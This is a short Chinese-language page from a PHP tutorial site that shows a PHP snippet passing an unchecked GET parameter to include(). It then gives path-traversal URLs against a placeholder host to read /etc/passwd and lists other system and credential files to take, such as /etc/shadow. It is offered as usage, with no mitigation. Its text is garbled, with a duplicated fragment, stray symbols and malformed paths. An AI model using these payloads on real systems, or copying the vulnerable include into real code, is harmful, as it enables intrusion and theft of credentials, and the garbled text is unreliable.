首頁 >後端開發 >php教程 >php 偽造本機檔案包含漏洞的程式碼

php 偽造本機檔案包含漏洞的程式碼

高洛峰
高洛峰原創
2016-11-30 13:17:231265瀏覽

程式碼如下: 
$page=$_GET['page']; 
include($page.'php'); 
?> 

你可以這樣使用
http
?> 

你可以這樣使用
http://www.xxx.com /index.php?page=../etc/passwd 
http://www.xxx.com/index.php?page=../../../etc/passwd 
http://www.xxx .com/index.php?page=..../../etc/passwd 

取得更多資料: 
etc/profile 
etc/services 
/etc/passwd 
/etc/shadow 
/c/group
/etc/security/group 
/etc/security/passwd 

/etc/security/user 🎜/etc/security/environ 🎜/etc/security/userits 
陳述:
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn